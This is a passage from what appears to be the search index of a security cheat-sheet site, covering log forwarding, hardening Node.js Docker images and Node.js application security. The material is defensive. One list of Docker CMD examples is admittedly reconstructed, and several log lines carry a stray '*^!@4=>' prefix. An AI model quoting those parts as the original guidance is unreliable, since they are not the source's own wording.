"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#secure-logging","title":"Secure logging","text":"

It is important that, in the event of a compromise of any information system, its logs cannot subsequently be modified by an attacker. To achieve this, copy the logs to a separate server, for example using the syslog protocol, which does not allow an attacker to modify logs: syslog only allows new events to be appended. The network security policy for this activity looks like this: In this example, we are also talking about application logs that may contain security events, as well as potentially important events that may indicate an attack.
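As a minimal sketch, assuming the application server uses rsyslog and the central log collector is reachable under the hypothetical name loghost.internal, forwarding can be enabled with a single rule:

# on the application server: forward all messages to the central log collector over TCP
echo '*.* @@loghost.internal:514' > /etc/rsyslog.d/90-forward.conf
systemctl restart rsyslog

A single @ instead of @@ would use UDP; the network policy should then allow only this one outbound port from the application segments to the logging segment.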

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#permissions-for-monitoring-systems","title":"Permissions for monitoring systems","text":"

Suppose a company uses Zabbix as an IT monitoring system. In this case, the policy might look like this:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#useful-links","title":"Useful links","text":""},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html","title":"Node.js Docker Cheat Sheet","text":"

The following cheat sheet provides production-grade guidelines for building optimized and secure Node.js Docker images. You'll find it helpful regardless of the Node.js application you aim to build. This article will be helpful for you if:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#1-use-explicit-and-deterministic-docker-base-image-tags","title":"1) Use explicit and deterministic Docker base image tags","text":"

It may seem an obvious choice to build your image based on the node Docker image, but what are you actually pulling in when you build the image? Docker images are always referenced by tags, and when you don't specify a tag, the default :latest tag is used.

So, in fact, by specifying the following in your Dockerfile, you always build the latest version of the Docker image that has been built by the Node.js Docker working group:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#from-node","title":"FROM node","text":"

The shortcomings of building based on the default node image are as follows:

  1. Docker image builds are inconsistent. Just like we\u2019re using lockfiles to get a deterministic npm install behavior every time we install npm packages, we\u2019d also like to get deterministic docker image builds. If we build the image from node\u2014which effectively means the node:latest tag\u2014then every build will pull a newly built Docker image of node. We don\u2019t want to introduce this sort of non-deterministic behavior.
  2. The node Docker image is based on a full-fledged operating system, full of libraries and tools that you may or may not need to run your Node.js web application. This has two downsides. Firstly a bigger image means a bigger download size which, besides increasing the storage requirement, means more time to download and re-build the image. Secondly, it means you\u2019re potentially introducing security vulnerabilities, that may exist in all of these libraries and tools, into the image.

In fact, the node Docker image is quite big and includes hundreds of security vulnerabilities of different types and severities. If you\u2019re using it, then by default your starting point is going to be a baseline of 642 security vulnerabilities, and hundreds of megabytes of image data that is downloaded on every pull and build.

The recommendations for building better Docker images are:

  1. Use small Docker images\u2014this will translate to a smaller software footprint on the Docker image reducing the potential vulnerability vectors, and a smaller size, which will speed up the image build process
  2. Use the Docker image digest, which is the static SHA256 hash of the image. This ensures that you are getting deterministic Docker image builds from the base image.

Based on this, let\u2019s ensure that we use the Long Term Support (LTS) version of Node.js, and the minimal alpine image type to have the smallest size and software footprint on the image:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#from-nodelts-alpine","title":"FROM node:lts-alpine","text":"

Nonetheless, this base image directive will still pull new builds of that tag. We can find the SHA256 hash for it on Docker Hub for this Node.js tag, or by running the following command once we've pulled the image locally, and locating the Digest field in the output:

$ docker pull node:lts-alpine\nlts-alpine: Pulling from library/node\n0a6724ff3fcd: Already exists\n9383f33fa9f3: Already exists\nb6ae88d676fe: Already exists\n565e01e00588: Already exists\nDigest: sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nStatus: Downloaded newer image for node:lts-alpine\ndocker.io/library/node:lts-alpine\n

Another way to find the SHA256 hash is by running the following command:

$ docker images --digests\nREPOSITORY                     TAG              DIGEST                                                                    IMAGE ID       CREATED             SIZE\nnode                           lts-alpine       sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a   51d926a5599d   2 weeks ago         116MB\n

Now we can update the Dockerfile for this Node.js Docker image as follows:

FROM node@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n

However, the Dockerfile above only specifies the Node.js Docker image name without an image tag, which creates ambiguity about which exact image tag is being used; it's not readable, it's hard to maintain, and it doesn't create a good developer experience.

Let\u2019s fix it by updating the Dockerfile, providing the full base image tag for the Node.js version that corresponds to that SHA256 hash:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#2-install-only-production-dependencies-in-the-nodejs-docker-image","title":"2) Install only production dependencies in the Node.js Docker image","text":"

The following Dockerfile directive installs all dependencies in the container, including devDependencies, which aren't needed for the application to function. It adds an unneeded security risk from packages used as development dependencies, as well as inflating the image size unnecessarily.

RUN npm install

Enforce deterministic builds with npm ci. This prevents surprises in a continuous integration (CI) flow because it halts if any deviations from the lockfile are made.

In the case of building a Docker image for production we want to ensure that we only install production dependencies in a deterministic way, and this brings us to the following recommendation for the best practice for installing npm dependencies in a container image:

RUN npm ci --only=production

The updated Dockerfile contents in this stage are as follows:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm ci --only=production\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#3-optimize-nodejs-tooling-for-production","title":"3) Optimize Node.js tooling for production","text":"

When you build your Node.js Docker image for production, you want to ensure that all frameworks and libraries are using the optimal settings for performance and security.

This brings us to add the following Dockerfile directive:

ENV NODE_ENV production

At first glance, this looks redundant, since we already specified only production dependencies in the npm install phase\u2014so why is this necessary?

Developers mostly associate the NODE_ENV=production environment variable setting with the installation of production-related dependencies; however, this setting also has other effects that we need to be aware of.

Some frameworks and libraries may only turn on the optimized configuration that is suited to production if that NODE_ENV environment variable is set to production. Putting aside our opinion on whether this is a good or bad practice for frameworks to take, it is important to know this.

As an example, the Express documentation outlines the importance of setting this environment variable for enabling performance and security related optimizations:

The performance impact of the NODE_ENV variable could be very significant.

Many of the other libraries that you are relying on may also expect this variable to be set, so we should set this in our Dockerfile.

The updated Dockerfile should now read as follows with the NODE_ENV environment variable setting baked in:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm ci --only=production\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#4-dont-run-containers-as-root","title":"4) Don\u2019t run containers as root","text":"

The principle of least privilege is a long-time security control from the early days of Unix and we should always follow this when we\u2019re running our containerized Node.js web applications.

The threat assessment is pretty straightforward: if an attacker is able to compromise the web application in a way that allows for command injection or directory path traversal, then these will be invoked with the user who owns the application process. If that process happens to be root, then they can do virtually anything within the container, including attempting a container escape or privilege escalation. Why would we want to risk it? You're right, we don't.

Repeat after me: \u201cfriends don\u2019t let friends run containers as root!\u201d

The official node Docker image, as well as its variants like alpine, includes a least-privileged user of the same name: node. However, it's not enough to just run the process as node. For example, the following might not be ideal for an application to function well:

USER node\nCMD \"npm\" \"start\"\n

The reason for that is the USER Dockerfile directive only ensures that the process is owned by the node user. What about all the files we copied earlier with the COPY instruction? They are owned by root. That\u2019s how Docker works by default.

The complete and proper way of dropping privileges is as follows, also showing our up to date Dockerfile practices up to this point:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY --chown=node:node . /usr/src/app\nRUN npm ci --only=production\nUSER node\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#5-properly-handle-events-to-safely-terminate-a-nodejs-docker-web-application","title":"5) Properly handle events to safely terminate a Node.js Docker web application","text":"

One of the most common mistakes I see in blogs and articles about containerizing Node.js applications is the way they invoke the process. All of the following, and their variants, are bad patterns you should avoid:
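Common variants of such invocations look like the following (listed here for illustration; the exact wording of the original list may differ):

CMD "npm" "start"
CMD ["yarn", "start"]
CMD "node" "server.js"
CMD "start-app.sh"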

Let\u2019s dig in! I\u2019ll walk you through the differences between them and why they\u2019re all patterns to avoid.

The following concerns are key to understanding the context for properly running and terminating Node.js Docker applications:

  1. An orchestration engine, such as Docker Swarm, Kubernetes, or even just Docker engine itself, needs a way to send signals to the process in the container. Mostly, these are signals to terminate an application, such as SIGTERM and SIGKILL.
  2. The process may run indirectly, and if that happens then it\u2019s not always guaranteed that it will receive these signals.
  3. The Linux kernel treats a process that runs as process ID 1 (PID 1) differently than any other process ID.

Equipped with that knowledge, let\u2019s begin investigating the ways of invoking the process for a container, starting off with the example from the Dockerfile we\u2019re building:

CMD \"npm\" \"start\"

The caveat here is twofold. Firstly, we're indirectly running the node application by directly invoking the npm client. Who's to say that the npm CLI forwards all signals to the node runtime? It actually doesn't, and we can easily test that.

Make sure that in your Node.js application you set an event handler for the SIGHUP signal which logs to the console every time you\u2019re sending an event. A simple code example should look as follows:

function handle(signal) {\n   console.log(`*^!@4=> Received event: ${signal}`)\n}\nprocess.on('SIGHUP', handle)\n

Then run the container, and once it\u2019s up specifically send it the SIGHUP signal using the docker CLI and the special --signal command-line flag:

$ docker kill --signal=SIGHUP elastic_archimedes

Nothing happened, right? That\u2019s because the npm client doesn\u2019t forward any signals to the node process that it spawned.

The other caveat has to do with the different ways in which you can specify the CMD directive in the Dockerfile. There are two ways, and they are not the same:

  1. the shell form notation, in which the container spawns a shell interpreter that wraps the process. In such cases, the shell may not properly forward signals to your process.
  2. the exec form notation, which directly spawns a process without wrapping it in a shell. It is specified using the JSON array notation, such as: CMD ["npm", "start"]. Any signals sent to the container are sent directly to the process.

Based on that knowledge, we want to improve our Dockerfile process execution directive as follows:

CMD ["node", "server.js"]

We are now invoking the node process directly, ensuring that it receives all of the signals sent to it, without it being wrapped in a shell interpreter.

However, this introduces another pitfall.

When a process runs as PID 1 it effectively takes on some of the responsibilities of an init system, which is typically responsible for initializing an operating system and processes. The kernel treats PID 1 differently than it treats other process identifiers. This special treatment means that a SIGTERM signal sent to a running process will not fall back to the default behavior of killing the process if the process has not already set a handler for it.

To quote the Node.js Docker working group recommendation on this:\u00a0 \u201cNode.js was not designed to run as PID 1 which leads to unexpected behaviour when running inside of Docker. For example, a Node.js process running as PID 1 will not respond to SIGINT (CTRL-C) and similar signals\u201d.

The way to go about it, then, is to use a tool that acts like an init process: it is invoked as PID 1 and then spawns our Node.js application as another process, whilst ensuring that all signals are proxied to that Node.js process. If possible, we'd like as small a tooling footprint as possible, so as not to risk adding security vulnerabilities to our container image.

One such tool is dumb-init which is statically linked and has a small footprint. Here\u2019s how we\u2019ll set it up:

RUN apk add dumb-init\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

This brings us to the following up to date Dockerfile. You\u2019ll notice that we placed the dumb-init package install right after the image declaration, so we can take advantage of Docker\u2019s caching of layers:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY --chown=node:node . .\nRUN npm ci --only=production\nUSER node\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

Good to know: docker kill and docker stop commands only send signals to the container process with PID 1. If you\u2019re running a shell script that runs your Node.js application, then take note that a shell instance\u2014such as /bin/sh, for example\u2014doesn\u2019t forward signals to child processes, which means your app will never get a SIGTERM.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#6-graceful-tear-down-for-your-nodejs-web-applications","title":"6) Graceful tear down for your Node.js web applications","text":"

If we\u2019re already discussing process signals that terminate applications, let\u2019s make sure we\u2019re shutting them down properly and gracefully without disrupting users.

When a Node.js application receives an interrupt signal, also known as SIGINT or CTRL+C, it will cause an abrupt process kill, unless event handlers have of course been set to handle it differently. This means that clients connected to the web application will be immediately disconnected. Now, imagine hundreds of Node.js web containers orchestrated by Kubernetes, going up and down as the need arises to scale or to manage errors. Not the greatest user experience.

You can easily simulate this problem. Here\u2019s a stock Fastify web application example, with an inherent delayed response of 60 seconds for an endpoint:

fastify.get('/delayed', async (request, reply) => {\n const SECONDS_DELAY = 60000\n await new Promise(resolve => {\n     setTimeout(() => resolve(), SECONDS_DELAY)\n })\n return { hello: 'delayed world' }\n})\n\nconst start = async () => {\n try {\n   await fastify.listen(PORT, HOST)\n   console.log(`*^!@4=> Process id: ${process.pid}`)\n } catch (err) {\n   fastify.log.error(err)\n   process.exit(1)\n }\n}\n\nstart()\n

Run this application and once it\u2019s running send a simple HTTP request to this endpoint:

$ time curl https://localhost:3000/delayed

Hit CTRL+C in the running Node.js console window and you\u2019ll see that the curl request exited abruptly. This simulates the same experience your users would receive when containers tear down.

To provide a better experience, we can do the following:

  1. Set an event handler for the various termination signals like SIGINT and SIGTERM.
  2. The handler waits for clean up operations like database connections, ongoing HTTP requests and others.
  3. The handler then terminates the Node.js process.

Specifically with Fastify, we can have our handler call on fastify.close() which returns a promise that we will await, and Fastify will also take care to respond to every new connection with the HTTP status code 503 to signal that the application is unavailable.

Let\u2019s add our event handler:

async function closeGracefully(signal) {\n   console.log(`*^!@4=> Received signal to terminate: ${signal}`)\n\n   await fastify.close()\n   // await db.close() if we have a db connection in this app\n   // await other things we should cleanup nicely\n   process.exit()\n}\nprocess.on('SIGINT', closeGracefully)\nprocess.on('SIGTERM', closeGracefully)\n

Admittedly, this is more of a generic web application concern than Dockerfile related, but is even more important in orchestrated environments.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#7-find-and-fix-security-vulnerabilities-in-your-nodejs-docker-image","title":"7) Find and fix security vulnerabilities in your Node.js docker image","text":"

See Docker Security Cheat Sheet - Use static analysis tools

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#8-use-multi-stage-builds","title":"8) Use multi-stage builds","text":"

Multi-stage builds are a great way to move from a simple, yet potentially erroneous Dockerfile, into separated steps of building a Docker image, so we can avoid leaking sensitive information. Not only that, but we can also use a bigger Docker base image to install our dependencies, compile any native npm packages if needed, and then copy all these artifacts into a small production base image, like our alpine example.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#prevent-sensitive-information-leak","title":"Prevent sensitive information leak","text":"

The use case here, avoiding the leakage of sensitive information, is more common than you think.

If you\u2019re building Docker images for work, there\u2019s a high chance that you also maintain private npm packages. If that\u2019s the case, then you probably needed to find some way to make that secret NPM_TOKEN available to the npm install.

Here\u2019s an example for what I\u2019m talking about:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nENV NPM_TOKEN 1234\nWORKDIR /usr/src/app\nCOPY --chown=node:node . .\n#RUN npm ci --only=production\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production\nUSER node\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

Doing this, however, leaves the .npmrc file with the secret npm token inside the Docker image. You could attempt to improve it by deleting it afterwards, like this:

RUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production\nRUN rm -rf .npmrc\n

However, now the .npmrc file is available in a different layer of the Docker image. If this Docker image is public, or someone is able to access it somehow, then your token is compromised. A better improvement would be as follows:

RUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production; \\\n   rm -rf .npmrc\n

The problem now is that the Dockerfile itself needs to be treated as a secret asset, because it contains the secret npm token inside it.

Luckily, Docker supports a way to pass arguments into the build process:

ARG NPM_TOKEN\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production; \\\n   rm -rf .npmrc\n

And then we build it as follows:

$ docker build . -t nodejs-tutorial --build-arg NPM_TOKEN=1234

I know you were thinking that we\u2019re all done at this point but, sorry to disappoint \ud83d\ude42

That\u2019s how it is with security\u2014sometimes the obvious things are yet just another pitfall.

What\u2019s the problem now, you ponder? Build arguments passed like that to Docker are kept in the history log. Let\u2019s see with our own eyes. Run this command:

$ docker history nodejs-tutorial

which prints the following:

IMAGE          CREATED              CREATED BY                                      SIZE      COMMENT\nb4c2c78acaba   About a minute ago   CMD [\"dumb-init\" \"node\" \"server.js\"]            0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   USER node                                       0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   RUN |1 NPM_TOKEN=1234 /bin/sh -c echo \"//reg\u2026   5.71MB    buildkit.dockerfile.v0\n<missing>      About a minute ago   ARG NPM_TOKEN                                   0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   COPY . . # buildkit                             15.3kB    buildkit.dockerfile.v0\n<missing>      About a minute ago   WORKDIR /usr/src/app                            0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   ENV NODE_ENV=production                         0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   RUN /bin/sh -c apk add dumb-init # buildkit     1.65MB    buildkit.dockerfile.v0\n

Did you spot the secret npm token there? That\u2019s what I mean.

There's a great way to manage secrets for the container image, but this is the time to introduce multi-stage builds as a mitigation for this issue, as well as to show how we can build minimal images.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#introducing-multi-stage-builds-for-nodejs-docker-images","title":"Introducing multi-stage builds for Node.js Docker images","text":"

Just like that principle in software development of Separation of Concerns, we\u2019ll apply the same ideas in order to build our Node.js Docker images. We\u2019ll have one image that we use to build everything that we need for the Node.js application to run, which in a Node.js world, means installing npm packages, and compiling native npm modules if necessary. That will be our first stage.

The second Docker image, representing the second stage of the Docker build, will be the production Docker image. This second and last stage is the image that we actually optimize for and publish to a registry, if we have one. That first image, which we'll refer to as the build image, gets discarded and is left as a dangling image on the Docker host that built it, until it gets cleaned up.

Here is the update to our Dockerfile that represents our progress so far, but separated into two stages:

# --------------> The build image\nFROM node:latest AS build\nARG NPM_TOKEN\nWORKDIR /usr/src/app\nCOPY package*.json /usr/src/app/\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production && \\\n   rm -f .npmrc\n\n# --------------> The production image\nFROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

As you can see, I chose a bigger image for the build stage because I might need tooling like gcc (the GNU Compiler Collection) to compile native npm packages, or for other needs.

In the second stage, there\u2019s a special notation for the COPY directive that copies the node_modules/ folder from the build Docker image into this new production base image.

Also, do you now see the NPM_TOKEN that was passed as a build argument to the intermediary build Docker image? It's not visible anymore in the docker history nodejs-tutorial command output because it doesn't exist in our production Docker image.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#9-keeping-unnecessary-files-out-of-your-nodejs-docker-images","title":"9) Keeping unnecessary files out of your Node.js Docker images","text":"

You have a .gitignore file to avoid polluting the git repository with unnecessary files, and potentially sensitive files too, right? The same applies to Docker images.

Docker has a .dockerignore file, which ensures that files matching the glob patterns inside it are not sent to the Docker daemon. Here is a list of files to give you an idea of what you might be putting into your Docker image that we'd ideally want to avoid:

.dockerignore\nnode_modules\nnpm-debug.log\nDockerfile\n.git\n.gitignore\n

As you can see, the node_modules/ is actually quite important to skip because if we hadn\u2019t ignored it, then the simplistic Dockerfile version that we started with would have caused the local node_modules/ folder to be copied over to the container as-is.

FROM node@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n

In fact, it's even more important to have a .dockerignore file when you are practicing multi-stage Docker builds. To refresh your memory on what the 2nd stage of the Docker build looks like:

# --------------> The production image\nFROM node:lts-alpine\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

The importance of having a .dockerignore is that when we do a COPY . /usr/src/app from the 2nd Dockerfile stage, we\u2019re also copying over any local node_modules/ to the Docker image. That\u2019s a big no-no as we may be copying over modified source code inside node_modules/.

On top of that, since we\u2019re using the wildcard COPY . we may also be copying into the Docker image sensitive files that include credentials or local configuration.

The take-away here for a .dockerignore file is:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#10-mounting-secrets-into-the-docker-build-image","title":"10) Mounting secrets into the Docker build image","text":"

One thing to note about the .dockerignore file is that it is an all or nothing approach and can\u2019t be turned on or off per build stages in a Docker multi-stage build.

Why is it important? Ideally, we would want to use the .npmrc file in the build stage, as we may need it because it includes a secret npm token to access private npm packages. Perhaps it also needs a specific proxy or registry configuration to pull packages from.

This means that it makes sense to have the .npmrc file available to the build stage\u2014however, we don\u2019t need it at all in the second stage for the production image, nor do we want it there as it may include sensitive information, like the secret npm token.

One way to mitigate this .dockerignore caveat is to mount a local file system that will be available for the build stage, but there\u2019s a better way.

Docker supports a relatively new capability referred to as Docker secrets, which is a natural fit for the case we have with .npmrc. Here is how it works:

Let\u2019s see how all of it works together. First the updated .dockerignore file:

.dockerignore\nnode_modules\nnpm-debug.log\nDockerfile\n.git\n.gitignore\n.npmrc\n

Then, the complete Dockerfile, with the updated RUN directive to install npm packages while specifying the .npmrc mount point:

# --------------> The build image\nFROM node:latest AS build\nWORKDIR /usr/src/app\nCOPY package*.json /usr/src/app/\nRUN --mount=type=secret,mode=0644,id=npmrc,target=/usr/src/app/.npmrc npm ci --only=production\n\n# --------------> The production image\nFROM node:lts-alpine\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

And finally, the command that builds the Node.js Docker image:

docker build . -t nodejs-tutorial --secret id=npmrc,src=.npmrc\n

Note: Secrets are a relatively new feature in Docker, and if you're using an older version, you might need to enable BuildKit as follows:

DOCKER_BUILDKIT=1 docker build . -t nodejs-tutorial --build-arg NPM_TOKEN=1234 --secret id=npmrc,src=.npmrc\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html","title":"NodeJS Security Cheat Sheet","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet lists actions developers can take to develop secure Node.js applications. Each item has a brief explanation and solution that is specific to the Node.js environment.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#context","title":"Context","text":"

Node.js applications are increasing in number, and they are no different from applications built with other frameworks and programming languages: Node.js applications are prone to all kinds of web application vulnerabilities.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#objective","title":"Objective","text":"

This cheat sheet aims to provide a list of best practices to follow during development of Node.js applications.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#recommendations","title":"Recommendations","text":"

There are several recommendations to enhance security of your Node.js applications. These are categorized as:

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#application-security","title":"Application Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-flat-promise-chains","title":"Use flat Promise chains","text":"

Asynchronous callback functions are one of the strongest features of Node.js. However, increasing layers of nesting within callback functions can become a problem. Any multistage process can become nested 10 or more levels deep. This problem is referred to as a "Pyramid of Doom" or "Callback Hell". In such code, errors and results get lost within the callbacks. Promises are a good way to write asynchronous code without getting into nested pyramids. Promises provide top-down execution while being asynchronous by delivering errors and results to the next .then function.

Another advantage of Promises is the way they handle errors. If an error occurs in a Promise chain, it skips over the .then functions and invokes the first .catch function it finds. This way Promises provide a higher assurance of capturing and handling errors. As a principle, you can make all your asynchronous code (apart from emitters) return promises. It should be noted that Promise calls can also become a pyramid. In order to completely stay away from "Callback Hell", flat Promise chains should be used. If the module you are using does not support Promises, you can convert the base object to a Promise by using a helper such as the Promise.promisifyAll() function provided by libraries like Bluebird.

The following code snippet is an example of \"Callback Hell\":

function func1(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func2(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func3(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func4(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\n\nfunc1(\"input1\", function(err, result1){\nif(err){\n// error operations\n}\nelse {\n//some operations\nfunc2(\"input2\", function(err, result2){\nif(err){\n//error operations\n}\nelse{\n//some operations\nfunc3(\"input3\", function(err, result3){\nif(err){\n//error operations\n}\nelse{\n// some operations\nfunc4(\"input 4\", function(err, result4){\nif(err){\n// error operations\n}\nelse {\n// some operations\n}\n});\n}\n});\n}\n});\n}\n});\n

The above code can be securely written as follows using a flat Promise chain:

function func1(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func2(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func3(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func4(name) {\n// operations that takes a bit of time and then resolves the promise\n}\n\nfunc1(\"input1\")\n.then(function (result){\nreturn func2(\"input2\");\n})\n.then(function (result){\nreturn func3(\"input3\");\n})\n.then(function (result){\nreturn func4(\"input4\");\n})\n.catch(function (error) {\n// error operations\n});\n

And using async/await:

async function func1(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nasync function func2(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nasync function func3(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nasync function func4(name) {\n// operations that takes a bit of time and then resolves the promise\n}\n\n(async() => {\ntry {\nlet res1 = await func1(\"input1\");\nlet res2 = await func2(\"input2\");\nlet res3 = await func3(\"input3\");\nlet res4 = await func4(\"input4\");\n} catch(err) {\n// error operations\n}\n})();\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-request-size-limits","title":"Set request size limits","text":"

Buffering and parsing of request bodies can be a resource intensive task. If there is no limit on the size of requests, attackers can send requests with large request bodies that can exhaust server memory and/or fill disk space. You can limit the request body size for all requests using raw-body.

const contentType = require('content-type')\nconst express = require('express')\nconst getRawBody = require('raw-body')\n\nconst app = express()\n\napp.use(function (req, res, next) {\nif (!['POST', 'PUT', 'DELETE'].includes(req.method)) {\nnext()\nreturn\n}\n\ngetRawBody(req, {\nlength: req.headers['content-length'],\nlimit: '1kb',\nencoding: contentType.parse(req).parameters.charset\n}, function (err, string) {\nif (err) return next(err)\nreq.text = string\nnext()\n})\n})\n

However, fixing a request size limit for all requests may not be the correct behavior, since some requests may have a large payload in the request body, such as when uploading a file. Also, input with a JSON type is more dangerous than a multipart input, since parsing JSON is a blocking operation. Therefore, you should set request size limits for different content types. You can accomplish this very easily with express middleware as follows:

app.use(express.urlencoded({ extended: true, limit: \"1kb\" }));\napp.use(express.json({ limit: \"1kb\" }));\n

It should be noted that attackers can change the Content-Type header of the request and bypass request size limits. Therefore, before processing the request, the data contained in the request should be validated against the content type stated in the request headers. If content type validation for each request severely affects performance, you can validate only specific content types or only requests larger than a predetermined size.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#do-not-block-the-event-loop","title":"Do not block the event loop","text":"

Node.js is very different from common application platforms that use threads. Node.js has a single-thread event-driven architecture. By means of this architecture, throughput becomes high and the programming model becomes simpler. Node.js is implemented around a non-blocking I/O event loop. With this event loop, there is no waiting on I/O or context switching. The event loop looks for events and dispatches them to handler functions. Because of this, when CPU intensive JavaScript operations are executed, the event loop waits for them to finish. This is why such operations are called \"blocking\". To overcome this problem, Node.js allows assigning callbacks to IO-blocked events. This way, the main application is not blocked and callbacks run asynchronously. Therefore, as a general principle, all blocking operations should be done asynchronously so that the event loop is not blocked.

Even if you perform blocking operations asynchronously, your application may still not serve as expected. This happens if there is code outside the callback that relies on the code within the callback running first. For example, consider the following code:

const fs = require('fs');\nfs.readFile('/file.txt', (err, data) => {\n// perform actions on file content\n});\nfs.unlinkSync('/file.txt');\n

In the above example, the unlinkSync function may run before the callback, which will delete the file before the desired actions on the file content are done. Such race conditions can also affect the security of your application. An example would be a scenario where authentication is performed in a callback and authenticated actions are run synchronously. In order to eliminate such race conditions, you can write all operations that rely on each other in a single non-blocking function. By doing so, you can guarantee that all operations are executed in the correct order. For example, the above code can be written in a non-blocking way as follows:

const fs = require('fs');\nfs.readFile('/file.txt', (err, data) => {\n// perform actions on file content\nfs.unlink('/file.txt', (err) => {\nif (err) throw err;\n});\n});\n

In the above code, the call to unlink the file and the other file operations are within the same callback. This provides the correct order of operations.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-input-validation","title":"Perform input validation","text":"

